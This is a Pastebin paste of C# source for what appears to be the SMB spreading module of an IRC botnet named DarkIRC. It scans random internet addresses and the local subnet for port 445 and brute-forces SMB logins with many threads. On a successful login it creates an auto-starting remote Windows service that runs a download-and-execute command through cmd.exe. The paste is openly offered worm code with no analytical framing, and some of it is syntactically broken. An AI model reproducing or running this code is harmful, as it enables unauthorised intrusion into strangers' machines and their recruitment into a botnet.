Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Collections.Generic;
- using System.Diagnostics;
- using System.IO;
- using System.Linq;
- using System.Net;
- using System.Net.Sockets;
- using System.Runtime.InteropServices;
- using System.Security.Cryptography;
- using System.Text;
- using System.Threading;
- namespace DarkIRC
- {
- class SMB
- {
- public static string dlexe = IRC.dlexecmd;
- public static int bruteSubThreads = 64;
- //password list can be viewed in this paste https://pastebin.com/6jiaGSNz
- public static void TestPW(string ip, string user, string passwd)
- {
- ip = "\\" + ip;
- try
- {
- using (var scmHandle = NativeMethods.OpenSCManager(ip, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE))
- {
- if (scmHandle.IsInvalid)
- {
- return;
- }
- using (
- var serviceHandle = NativeMethods.CreateService(
- scmHandle,
- "shell32.dll",
- "shell32.dll",
- NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS,
- NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS,
- NativeMethods.SERVICE_START_TYPES.SERVICE_AUTO_START,
- NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_NORMAL,
- "C:\\Windows\\System32\\CMD.exe /C " + dlexe,
- null,
- IntPtr.Zero,
- null,
- user,
- passwd))
- {
- if (serviceHandle.IsInvalid)
- {
- return;
- }
- }
- }
- }
- catch
- {
- }
- }
- public static void SMBHaxx(string ip)
- {
- int count = 0;
- Thread[] threads = new Thread[bruteSubThreads];
- for (var u = 0; u < users.Length - 1; u++)
- {
- for (var p = 0; p < passwords.Length - 1; p++)
- {
- threads[count] = new Thread(() => TestPW(ip, users[u], passwords[p]));
- threads[count].Start();
- count++;
- if (count > bruteSubThreads)
- {
- for (int i = 0; i < bruteSubThreads; i++)
- {
- threads[i].Join();
- }
- count = 0;
- GC.Collect();
- }
- }
- }
- }
- public static void WorkGroup()
- {
- while (true)
- {
- using (TcpClient tcpClient = new TcpClient())
- {
- try //scan an ipv4 address
- {
- var data = new byte[4];
- new Random().NextBytes(data);
- while (data[0] == 192 || data[0] == 10 || data[0] == 127 || data[0] == 169 || data[0] == 172)
- {
- new Random().NextBytes(data);
- }
- IPAddress ip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- // Connect using a timeout (5 seconds)
- IAsyncResult result = socket.BeginConnect(ip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true);
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(ip.ToString());
- }
- else
- {
- socket.Close();
- }
- }
- catch (Exception)
- {
- }
- try //scan an ipv6 address
- {
- var data = new byte[16];
- new Random().NextBytes(data);
- IPAddress ip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetworkV6, SocketType.Stream, ProtocolType.Tcp);
- IAsyncResult result = socket.BeginConnect(ip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true);
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(ip.ToString());
- }
- else
- {
- socket.Close();
- }
- }
- catch (Exception)
- {
- }
- }
- }
- }
- public static void internalNetwork()
- {
- try
- {
- var host = Dns.GetHostEntry(Dns.GetHostName());
- foreach (var ip in host.AddressList)
- {
- if (ip.AddressFamily == AddressFamily.InterNetwork)
- {
- string subnet = String.Join(".", ip.ToString().Split(".".ToCharArray()[0]).Skip(2));
- for (int i = 0; i < 255; i++)
- {
- for (var ii = 1; ii < 254; ii++)
- {
- byte[] data = new byte[4] { Convert.ToByte(int.Parse(subnet.Split(".".ToCharArray()[0])[0])), Convert.ToByte(int.Parse(subnet.Split(".".ToCharArray()[0])[1])), Convert.ToByte(i), Convert.ToByte(ii) };
- IPAddress thisip = new IPAddress(data);
- Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- // Connect using a timeout (5 seconds)
- IAsyncResult result = socket.BeginConnect(thisip, 445, null, null);
- bool success = result.AsyncWaitHandle.WaitOne(1000, true);
- if (socket.Connected)
- {
- socket.EndConnect(result);
- SMBHaxx(thisip.ToString());
- }
- else
- {
- socket.Close();
- }
- }
- }
- }
- }
- }
- finally
- {
- }
- catch { }
- }
- }
- }
Add Comment
Please, Sign In to add comment